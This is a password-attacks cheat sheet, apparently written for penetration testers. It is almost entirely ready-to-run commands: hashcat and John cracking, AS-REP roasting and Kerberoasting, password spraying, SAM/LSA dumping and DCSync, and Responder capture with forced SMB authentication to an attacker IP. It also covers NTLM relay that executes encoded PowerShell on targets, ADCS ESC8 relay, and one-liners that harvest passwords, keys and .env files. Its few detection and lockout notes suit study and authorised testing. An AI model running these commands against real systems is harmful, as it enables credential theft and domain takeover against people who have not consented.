Password Attacks Cheat Sheet
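#HASH IDENTIFICATION
# hash-identifier (interactive)
hash-identifier
# hashid
hashid '$6$...'
hashid -m '$6$rounds=5000$...' # -m prints the matching hashcat mode next to each guess
# hashcat auto-detect (newer hashcat builds; lists EVERY mode whose syntax matches, so still pick deliberately)
hashcat --identify hash.txt
# Confirm a guess against hashcat's reference sample before starting a long run
hashcat --example-hashes -m 1800 | head
# Manual indicators
# $1$ = MD5 crypt (hashcat 500)
# $2a$ = bcrypt (hashcat 3200)
# $2b$ = bcrypt (hashcat 3200)
# $2y$ = bcrypt (hashcat 3200)
# $5$ = SHA-256 crypt (hashcat 7400)
# $6$ = SHA-512 crypt (hashcat 1800)
# 32 hex chars = MD5 (0), NTLM (1000) or LM (3000) -- length alone cannot separate these;
#                decide from where the hash came (SAM/NTDS dump -> NTLM/LM, web app DB -> MD5)
# 40 hex chars = SHA1 (100)
# 64 hex chars = SHA-256 (1400)
# 128 hex chars = SHA-512 (1700)
# $krb5asrep$23$ = AS-REP, RC4 etype 23 (18200)
# $krb5tgs$23$ = Kerberoast TGS, RC4 etype 23 (13100)
# $krb5tgs$17$ = Kerberoast AES128-CTS etype 17 (19600)
# $krb5tgs$18$ = Kerberoast AES256-CTS etype 18 (19700)
# $netntlmv2$ = NetNTLMv2 in John's prefixed form (5600); Responder/ntlmrelayx output (user::domain:challenge:hmac:blob) needs no prefix
# NTLM has no prefix in hashcat: feed the bare 32 hex (1000). John's --format=NT takes bare hex or $NT$<hex>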
BASH
#HASHCAT MODE TABLE (EXPANDED)
Mode Hash Type (verify any entry before a long run: hashcat --example-hashes -m <mode>)
0 MD5
10 md5($pass.$salt)
20 md5($salt.$pass)
100 SHA1
150 HMAC-SHA1 (key = $pass)
200 MySQL323
300 MySQL4.1/MySQL5
500 md5crypt, MD5 (Unix), Cisco-IOS $1$
1000 NTLM
1100 Domain Cached Credentials (DCC), MS Cache
1400 SHA2-256
1700 SHA2-512
1800 sha512crypt $6$, SHA512 (Unix)
2100 Domain Cached Credentials 2 (DCC2), MS Cache 2
2500 WPA-EAPOL-PBKDF2 (legacy .hccapx input; newer hashcat expects the 22000 hash line format for new captures)
3000 LM
3200 bcrypt $2*$, Blowfish (Unix)
3710 md5($salt.md5($pass))
400 phpass: WordPress, Joomla, phpBB3 (the mode is 400, not 4000)
4010 md5($salt.md5($salt.$pass)) -- not a macOS mode; macOS v10.8+ (PBKDF2-SHA512) is 7100
5400 IKE-PSK SHA1
5500 NetNTLMv1 / NetNTLMv1+ESS
5600 NetNTLMv2
5800 Samsung Android Password/PIN
7300 IPMI2 RAKP HMAC-SHA1
7400 sha256crypt $5$, SHA256 (Unix)
7500 Kerberos 5, etype 23, AS-REQ Pre-Auth
7700 SAP CODVN B (BCODE)
7800 SAP CODVN F/G (PASSCODE)
8200 1Password, AgileBits PBKDF2-HMAC-SHA1 + AES
8400 WBB3 (Woltlab Burning Board)
8800 Android FDE (Samsung DEK)
8900 scrypt
9200 Cisco $8$
9300 Cisco $9$
9600 MS Office 2013
9700 MS Office <= 2003 $0/$1, MD5 + RC4
9800 MS Office <= 2003 $3/$4, SHA1 + RC4
10000 Django (PBKDF2-SHA256)
10300 SAP CODVN H (PWDSALTEDHASH) iSSHA-1
10400 PDF 1.1 - 1.3 (Acrobat 2 - 4)
10500 PDF 1.4 - 1.6 (Acrobat 5 - 8)
10600 PDF 1.7 Level 3 (Acrobat 9)
10800 SHA2-384
10900 PBKDF2-HMAC-SHA256
11400 SIP digest authentication (MD5)
11600 7-Zip
11700 GOST R 34.11-2012 (Streebog) 256-bit
12000 PBKDF2-HMAC-SHA1
12500 RAR3-hp
12600 ColdFusion 10+
13000 RAR5
13100 Kerberos 5, etype 23, TGS-REP (kerberoasting)
13400 KeePass 1 (AES/Twofish) and KeePass 2 (AES)
13500 PeopleSoft PS_TOKEN
13600 WinZip
13711 VeraCrypt SHA256 XTS 512
16000 Tripcode
16100 TACACS+
16700 FileVault 2
16800 WPA-PMKID-PBKDF2
16801 WPA-PMKID-PMK
16900 Ansible Vault (previous label "RFC 5961 SCRAM SHA-1" was wrong; SCRAM is RFC 5802 and is not mode 16900)
17200 PKZIP (Compressed)
17500 SHA3-384 (17300/17400/17600 = SHA3-224/256/512)
18000 Keccak-512 (17700/17800/17900 = Keccak-224/256/384); Django PBKDF2-SHA256 is mode 10000, not 18000
18100 TOTP (HMAC-SHA1, RFC 6238)
18200 Kerberos 5, etype 23, AS-REP (AS-REP roasting)
18300 Apple File System (APFS) Encrypted User
18400 Open Document Format (ODF) 1.2
18600 Open Document Format (ODF) 1.1
18900 Android Backup (PBKDF2-HMAC-SHA1+AES)
19000 QNX /etc/shadow (MD5); 19100 = QNX /etc/shadow (SHA256); 19200 = QNX /etc/shadow (SHA512)
19600 Kerberos 5, etype 17, TGS-REP (Kerberoasting AES128-CTS)
19700 Kerberos 5, etype 18, TGS-REP (Kerberoasting AES256-CTS)
20000 Python Werkzeug PBKDF2-HMAC-SHA256
20600 Oracle Transportation Management SHA-256
21000 BitShares v0.x - sha512(sha512_bin(pass))
21400 sha256(sha256_bin(pass))
22000 WPA-PBKDF2-PMKID+EAPOL
22001 WPA-PMK-PMK
22100 BitLocker
22200 Citrix NetScaler (SHA1)
22500 MultiBit Classic .key (MD5)
22700 MultiBit HD (scrypt)
TEXT
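#JOHN FORMAT MATCHING
# List all formats
john --list=formats
# If john prints "Warning: detected hash type X, but the string is also recognized as Y",
# pass --format explicitly. The SAME --format must be repeated on --show, or nothing is printed.
# Common pentest formats
--format=NT # NTLM hash (bare 32 hex or $NT$<hex>)
--format=LM # LM hash
--format=Raw-MD5 # MD5
--format=Raw-SHA1 # SHA1
--format=Raw-SHA256 # SHA-256
--format=Raw-SHA512 # SHA-512
--format=krb5tgs # Kerberos TGS (kerberoasting)
--format=krb5asrep # Kerberos AS-REP (asreproast)
--format=netntlmv2 # NetNTLMv2
--format=netntlm # NetNTLMv1
--format=bcrypt # bcrypt ($2*$)
--format=sha512crypt # Unix SHA-512 ($6$)
--format=sha256crypt # Unix SHA-256 ($5$)
--format=md5crypt # Unix MD5 ($1$)
--format=descrypt # Unix DES (legacy)
--format=mysqlna # MySQL network authentication (sniffed challenge/response) -- stored mysql.user hashes are mysql-sha1
--format=zip # PKZIP (convert archives with zip2john first)
--format=rar # RAR (rar2john)
--format=7z # 7-Zip (7z2john)
--format=keepass # KeePass (keepass2john)
--format=office # MS Office (office2john)
--format=pdf # PDF (pdf2john)
--format=wpa # WPA handshake (wpapcap2john)
# John cracking examples
john --wordlist=rockyou.txt hash.txt --format=NT
john --wordlist=rockyou.txt --rules=best64 hash.txt # best64 rule set ships with jumbo builds
john --incremental hash.txt --format=Raw-MD5 # brute force; runs until killed, use --incremental=Digits etc. to bound the charset
john --show --format=NT hash.txt # show cracked (reads ~/.john/john.pot; needs the same --format as the cracking run)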
BASH
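#WORDLIST LOCATIONS (KALI)
# Primary wordlists
/usr/share/wordlists/rockyou.txt.gz # classic, shipped compressed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz # one-time decompress -> /usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt # directory brute
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# SecLists (install: apt install seclists)
/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt # NOTE: some SecLists versions ship this as rockyou.txt.tar.gz -- check with ls
/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt # rockyou trimmed to the top ~75% by frequency; good first pass for slow hashes
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
# Other useful lists
/usr/share/dirb/wordlists/common.txt
/opt/SecLists/Passwords/ (if cloned to /opt)
/usr/share/wordlists/fasttrack.txt # small, good for a quick spray candidate list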
BASH
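#HASHCAT RULE SETS
# Built-in rules (Kali)
/usr/share/hashcat/rules/best64.rule # Fast, efficient
/usr/share/hashcat/rules/dive.rule # Aggressive, many variants
/usr/share/hashcat/rules/generated2.rule
/usr/share/hashcat/rules/Incisive-leetspeak.rule
/usr/share/hashcat/rules/T0XlC.rule
# Third-party rules (download separately)
# OneRuleToRuleThemAll.rule - comprehensive, high hit rate
# hob064.rule - good companion
# pantagrule.rule - for large wordlists
# Apply rules. -r resolves relative to the CURRENT DIRECTORY, not the rules folder:
# use the full path unless you copied the rule file next to your hashes.
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Stacked rules multiply: each candidate goes through every best64 rule, then each result through every dive rule.
# rockyou (~14M) x best64 (77) x dive (~99k) is far beyond what a slow hash (bcrypt, DCC2) can finish -- stack only on fast hashes.
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/dive.rule # stacked
hashcat -m 18200 asrep.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Rule stats: count candidates before committing GPU time
hashcat --stdout rockyou.txt -r /usr/share/hashcat/rules/best64.rule | wc -l # how many candidates generated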
BASH
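#HASHCAT MASK ATTACK (-a 3)
# Mask syntax
# ?l = lowercase ?u = uppercase ?d = digit
# ?s = special ?a = all ?b = 0x00-0xff
# Keyspace = product of charset sizes per position: ?a x8 = 95^8 ~ 6.6e15 -- fine for NTLM on a GPU rig,
# hopeless for bcrypt/DCC2. Estimate before launching: hashcat -m <mode> -a 3 --keyspace <mask>
# Common masks
hashcat -m 1000 hashes.txt -a 3 ?l?l?l?l?l?l?l?l # 8 lowercase
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?l # Capital + 7 low
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d?d # Capital + 6 low + 2 digits (e.g. Company24)
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?l?d?d?d?d?s # Capital + 6 low + 4 digits + symbol (Company2024!)
hashcat -m 1000 hashes.txt -a 3 -1 ?l?d ?u?1?1?1?1?1?1?1 # custom charset ?1 = lowercase or digit
hashcat -m 1000 hashes.txt -a 3 -1 ?l?d?s Company?1?1?1?1?1 # Company followed by 5 mixed
hashcat -m 1000 hashes.txt -a 3 Summer?d?d?d?d # Summer0000 .. Summer9999 (covers Summer2024)
hashcat -m 1000 hashes.txt -a 3 -1 ?d?l?u ?1?1?1?1?1?1?1?1 # 8 mixed alphanumeric
# Increment mode (try lengths 1-8; the mask must be at least --increment-max long)
hashcat -m 1000 hashes.txt -a 3 --increment --increment-min 1 --increment-max 8 ?l?l?l?l?l?l?l?l
# Hybrid: wordlist + mask
hashcat -m 1000 hashes.txt -a 6 rockyou.txt ?d?d?d # word + 3 digits
hashcat -m 1000 hashes.txt -a 7 ?d?d rockyou.txt # 2 digits + word
# Optimize for GPU
# -O caps the candidate length (commonly 31 chars for fast unsalted modes, lower for salted ones); hashcat prints the
# resulting "Maximum password length" at startup -- passwords longer than that are silently unreachable.
hashcat -m 1000 hashes.txt -O -a 3 ?a?a?a?a?a?a?a?a # -O optimized kernel
# -w 4 starves the desktop and can hit thermal throttling on laptops; -w 3 is the usual headless default.
hashcat -m 1000 hashes.txt -a 3 -w 4 ?a?a?a?a?a?a?a?a # -w 4 max power
# Hashcat benchmark
hashcat -b
hashcat -b -m 1000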
BASH
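#AS-REP ROASTING
# GetNPUsers (Impacket) - unauthenticated with a user list: only accounts flagged DONT_REQ_PREAUTH answer,
# every other name just yields KDC_ERR_PREAUTH_REQUIRED (and a 4768 failure on the DC per name tried)
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5 -request -outputfile asrep.txt
# GetNPUsers - single user with known UPN
impacket-GetNPUsers domain.local/user -no-pass -dc-ip 10.10.10.5 -request
# GetNPUsers - authenticated: LDAP-enumerates every pre-auth-disabled account, no user list needed
impacket-GetNPUsers domain.local/user:pass -dc-ip 10.10.10.5 -request -outputfile asrep.txt
# Output format: -format hashcat is the DEFAULT (mode 18200, $krb5asrep$23$ lines); add -format john for John's layout.
# There is no need to edit the installed GetNPUsers.py, and "john --show" is not a converter -- it only prints
# hashes already present in john.pot.
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5 -request -format john -outputfile asrep.john
# Netexec LDAP
netexec ldap 10.10.10.5 -u users.txt -p '' --asreproast asrep.txt
# Crack AS-REP (hashcat mode 18200)
# Never add --force: it only suppresses the warnings (unsupported driver, unparsable hash lines) that explain an empty result.
hashcat -m 18200 -a 0 asrep.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 18200 -a 0 asrep.txt rockyou.txt -O -w 4
# Crack AS-REP (John) -- if john rejects the file, regenerate it with -format john as above
john --wordlist=rockyou.txt --format=krb5asrep asrep.john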
BASH
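#KERBEROASTING
# GetUserSPNs (Impacket) -- needs ANY valid domain account; -request pulls a TGS for every SPN account found
impacket-GetUserSPNs domain.local/user:pass -dc-ip 10.10.10.5 -request -outputfile kerberoast.txt
impacket-GetUserSPNs domain.local/user -hashes :NTHASH -dc-ip 10.10.10.5 -request # pass-the-hash; LM half left empty
impacket-GetUserSPNs domain.local/user:pass -dc-ip 10.10.10.5 -request-user svc_sql # single target, fewer 4769 events
# Netexec
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
# Output mixes encryption types: a service account with only AES keys yields $krb5tgs$17$/$18$ lines, RC4-capable
# accounts yield $krb5tgs$23$. Split the file before cracking -- hashcat refuses a mixed file for one -m.
grep '\$krb5tgs\$23\$' kerberoast.txt > kerberoast_rc4.txt
grep -E '\$krb5tgs\$1[78]\$' kerberoast.txt > kerberoast_aes.txt
# Detection note: an RC4 (0x17) TGS request for an AES-only account is a classic Kerberoast indicator in event 4769.
# Crack TGS (hashcat mode 13100 for RC4, 19600 for AES128, 19700 for AES256 -- AES modes are ~100x slower than RC4)
hashcat -m 13100 -a 0 kerberoast_rc4.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule -O -w 4
hashcat -m 19700 -a 0 kerberoast_aes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Crack TGS (John)
john --wordlist=rockyou.txt --format=krb5tgs kerberoast.txt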
BASH
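#PASSWORD SPRAYING
# Read the lockout policy FIRST. Every protocol below (SMB, LDAP, WinRM, Kerberos) increments badPwdCount on the DC;
# stay at least one attempt below the threshold and wait out the observation window between rounds.
netexec smb dc.domain.local -u user -p pass --pass-pol
# Netexec SMB spray (one password, many users)
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success # do not stop at the first hit
netexec smb 10.10.10.0/24 -u users.txt -p 'Password1' --local-auth # local SAM accounts on each host, not domain accounts
netexec smb 10.10.10.0/24 -u users.txt -p 'Password1' --no-bruteforce # with -u FILE -p FILE: pair line N with line N instead of every combination
netexec smb dc.domain.local -u users.txt -p 'Summer2024!'
# Netexec SMB spray (one user, many passwords - reverse spray)
# This is a brute force against ONE account and will lock it out -- only for accounts you know are exempt from lockout.
netexec smb 10.10.10.5 -u admin -p passwords.txt
# Netexec LDAP spray (quieter on member servers because nothing touches them, but each failed bind still counts
# toward lockout and still produces failed-logon events on the DC)
netexec ldap 10.10.10.5 -u users.txt -p 'Password1'
# Netexec WinRM spray
netexec winrm 10.10.10.0/24 -u users.txt -p 'Password1'
# SprayingToolkit atomizer sprays web front ends (OWA / Lync / IMAP), not Kerberos -- check atomizer.py -h for argument order.
# Kerberos pre-auth spraying (e.g. kerbrute) swaps event 4625 for 4771; it does NOT avoid lockout, badPwdCount still increments.
python3 /opt/SprayingToolkit/atomizer.py users.txt domain.local 'Summer2024!'
# Password generation for spray (time-based)
# Month + Year: April2024!, July2024!, August2024!
# Season + Year: Spring2024!, Summer2024!, Winter2024!
# Company + digits: Company123, Company2024
# Create targeted wordlist from company info
hashcat --stdout -a 3 'Company?d?d?d' > company_passwords.txt
hashcat --stdout -a 6 rockyou.txt '?d?d?d?d' | head -n 10000 > common4digit.txt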
BASH
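#NTLM HASH EXTRACTION
# Dump SAM + SYSTEM locally (requires an elevated prompt). The saved hives hold every local hash and LSA secret:
# pull them off the box and delete them from C:\temp when done.
reg.exe save hklm\sam C:\temp\sam.hive
reg.exe save hklm\system C:\temp\system.hive
reg.exe save hklm\security C:\temp\security.hive
# Transfer to attacker, then:
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL # adds LSA secrets + cached domain creds (DCC2 -> mode 2100, slow to crack)
# Remote dump (requires admin creds)
impacket-secretsdump domain.local/admin:pass@10.10.10.5
impacket-secretsdump domain.local/admin@10.10.10.5 -hashes :NTHASH
# Netexec SAM dump
netexec smb 10.10.10.5 -u admin -p pass --sam
netexec smb 10.10.10.5 -u admin -p pass --lsa # LSA secrets + DCC2 cached logons
netexec smb 10.10.10.5 -u admin -p pass -M lsassy # LSASS memory via lsassy; EDR-sensitive
# DCSync (needs Replicating Directory Changes rights, i.e. Domain Admin / DC account / explicitly delegated)
# Logs event 4662 on the DC with the DS-Replication-Get-Changes GUIDs from a non-DC source IP -- high-confidence detection.
impacket-secretsdump -just-dc-user administrator domain.local/user:pass@DC
impacket-secretsdump domain.local/admin:pass@DC -just-dc
impacket-secretsdump domain.local/admin:pass@DC -just-dc-ntlm # NT hashes only, skips Kerberos keys / cleartext
# Mimikatz: lsadump::dcsync /user:krbtgt /domain:domain.local
# Crack NTLM
hashcat -m 1000 ntlm_hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule -O -w 4
hashcat -m 1000 --username ntds.txt rockyou.txt # keep the user:RID:LM:NT::: lines intact and let hashcat strip the prefix
# Format: username:USERID:LM:NTLM:::
# LM blank = aad3b435b51404eeaad3b435b51404ee
# NTLM of the empty password = 31d6cfe0d16ae931b73c59d7e0c089c0 (disabled/never-set accounts; skip these)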
BASH
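#NETNTLMv2 CAPTURE AND CRACKING
# Start SMB capture (attacker)
sudo responder -I tun0 -wv # -w answers WPAD, -v verbose
# -d answers DHCP broadcasts on current Responder builds: it rewrites clients' network config and is disruptive --
# check `responder -h` for your version before adding it. -P forces proxy auth (HTTP 407) so browsers send NTLM.
sudo responder -I tun0 -wvP # HTTP proxy auth + SMB
# Impacket smbserver also prints the NetNTLMv2 of every client that authenticates to it
impacket-smbserver share . -smb2support
# Trigger on target (force SMB connection to attacker)
dir \\10.10.14.5\share
start \\10.10.14.5\share
# Or via: petitpotam, printerbug, coercion tools
# Extract hash from Responder logs
# Responder stores in: /usr/share/responder/logs/ (one SMB-NTLMv2-SSP-<ip>.txt per source; duplicates per user are harmless)
# Format: user::domain:challenge:HMAC:blob
# Crack NetNTLMv2 (hashcat mode 5600). No --force: it hides the parse/driver warnings that explain an empty run.
hashcat -m 5600 netntlmv2.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule -O -w 4
hashcat -m 5600 netntlmv2.txt rockyou.txt -r /usr/share/hashcat/rules/dive.rule
# Crack NetNTLMv1 (hashcat mode 5500)
hashcat -m 5500 netntlmv1.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# NetNTLMv1 captured against a fixed challenge (Responder's default 1122334455667788, --lm) can be reduced to the
# NT hash itself via DES key recovery (ntlmv1-multi) instead of guessed -- no wordlist needed, then pass-the-hash.
# Crack with John
john --wordlist=rockyou.txt --format=netntlmv2 netntlmv2.txt
# NTLM relay (instead of cracking). Only hosts WITHOUT SMB signing required are relayable -- build the list first,
# and turn Responder's own SMB/HTTP servers Off in Responder.conf so ntlmrelayx owns ports 445/80.
netexec smb 10.10.10.0/24 --gen-relay-list targets.txt
impacket-ntlmrelayx -tf targets.txt -smb2support # default: dump SAM on each target where the relayed user is admin
impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc BASE64" # run a command (needs local admin on target)
impacket-ntlmrelayx -tf targets.txt -smb2support -i # interactive SMB shell, bind on localhost port printed in output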
BASH
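#CREDENTIAL HARVESTING - ONE-LINERS
# Linux: grep for passwords in common locations (2>/dev/null hides permission-denied noise, it does not hide hits)
grep -rn "password\|passwd\|pass\b\|pwd" /var/www 2>/dev/null
grep -rn "DB_PASS\|DB_USER\|DATABASE_URL\|CONNECTION_STRING" /var/www 2>/dev/null
grep -rn "API_KEY\|SECRET\|TOKEN\|JWT_SECRET" /var/www 2>/dev/null
grep -rn "^\$pw\|password\s*=" /etc /opt 2>/dev/null
cat ~/.bash_history ~/.zsh_history 2>/dev/null | grep -i "pass\|curl\|wget\|ssh\|mysql"
# Paths with spaces break plain xargs -- use -print0 / xargs -0. Parentheses keep -o from swallowing -type f.
# find / walks every mount (slow, noisy in audit logs); add -xdev to stay on the root filesystem.
find / \( -name "*.conf" -o -name "*.config" -o -name "*.ini" \) -type f -print0 2>/dev/null | xargs -0 grep -l "pass" 2>/dev/null
# Linux: config file enum
find / -name "wp-config.php" -type f -print0 2>/dev/null | xargs -0 cat
find / -name ".env" -type f -print0 2>/dev/null | xargs -0 cat
find / \( -name "id_rsa" -o -name "*.pem" -o -name "*.ppk" \) -type f 2>/dev/null
# Windows: find stored credentials
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
dir /s /b C:\*pass*.txt C:\*cred*.txt C:\*.config C:\*.ini 2>nul
findstr /s /i "password" C:\*.xml C:\*.ini C:\*.txt C:\*.cfg 2>nul
# Windows: PowerShell cred scan (-File skips directories, which Select-String would otherwise error on)
Get-ChildItem C:\ -Recurse -Force -File -ErrorAction SilentlyContinue | Select-String "password=" -ErrorAction SilentlyContinue | Select-Object -Unique Path
findstr /s /i /c:"ConnectionString" C:\*.config
findstr /s /i /c:"password" C:\inetpub\wwwroot\*.php 2>nul
# Also worth a look on Windows: unattend.xml / sysprep.inf (base64 local admin), Group Policy Preferences cpassword in SYSVOL (gpp-decrypt)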
BASH
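#HASHCAT POT FILE MANAGEMENT
# hashcat records every crack in ~/.local/share/hashcat/hashcat.potfile (or hashcat.potfile next to the binary);
# already-cracked hashes are skipped on later runs, which is why a re-run can report "All hashes found in potfile".
hashcat -m 1000 hashes.txt --show # Show already cracked passwords (no wordlist needed: this only reads the potfile)
hashcat -m 1000 hashes.txt --left # Show the hashes that are still uncracked
hashcat -m 1000 --username ntds.txt --show # keep user:hash pairs together when the input has usernames
hashcat -m 1000 hashes.txt rockyou.txt -o cracked.txt # Output cracked to file as hash:plain
# --force does NOT touch the potfile; it only suppresses warnings and should not be used. To ignore or isolate the potfile:
hashcat -m 1000 hashes.txt rockyou.txt --potfile-disable # ignore previous results for this run
hashcat -m 1000 hashes.txt rockyou.txt --potfile-path client.pot # separate potfile per engagement -- it is cleartext, treat it as loot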
BASH
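#CUSTOM WORDLIST GENERATION
# Cewl -- Custom wordlist generation from target website
cewl http://target.com -d 2 -m 5 -w custom_wordlist.txt
# -d 2: depth 2, -m 5: minimum word length 5
cewl http://target.com -d 2 -m 5 --with-numbers -w custom_wordlist.txt # keep tokens like Company2024
cewl http://target.com -d 2 -e --email_file emails.txt # harvest e-mail addresses -> username candidates
# Run the cewl output through rules (best64 / OneRule) before spraying; raw site words rarely match a policy on their own
# username-anarchy -- Generate username patterns from "First Last" lines in one input file
username-anarchy -i names.txt -f first.last,flast,firstl,first_last
username-anarchy -l # list every supported format
# Common formats: first.last, flast, firstl, first_last, first.last@domain (verify the exact option names with username-anarchy -h)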
BASH
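#NTLM RELAY ATTACKS (ADVANCED)
# NTLM relay attacks (beyond just capture)
# ADCS web enrollment (ESC8): relay to the CA's HTTP endpoint, not to an SMB target list. Works when the CA exposes
# certsrv over HTTP without EPA/channel binding; relaying a DC's machine account with the DomainController template
# yields a certificate usable for PKINIT -> DCSync.
impacket-ntlmrelayx -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# RBCD via LDAP: give -t OR -tf, not both. Requires LDAP signing not enforced and no channel binding;
# an SMB-originated auth carries NTLMSSP_NEGOTIATE_SIGN and is dropped by LDAP, so coerce over HTTP/WebDAV instead.
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support --delegate-access # RBCD on the relayed computer account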
BASH
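#OPSEC NOTES
# OPSEC: Password spraying generates failed-logon telemetry on every protocol -- 4625 on the target host for SMB/WinRM,
# 4776 on the DC for NTLM validation, 4771 on the DC for Kerberos pre-auth failures -- and every one of them
# increments badPwdCount, so it can trigger account lockouts. Read the policy (nxc ... --pass-pol) before spraying.
# Space attempts out: nxc's flag for a random pause between authentications is --jitter (seconds); confirm the exact
# option name and unit for your version with `nxc smb --help`.
#   nxc smb <target> -u users.txt -p pass --jitter 3
# --continue-on-success keeps going after a valid credential is found -- it does not add lockout risk by itself,
# but combined with a password list per user it turns a spray into a brute force. One password per round, then wait
# out the lockout observation window.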
TEXT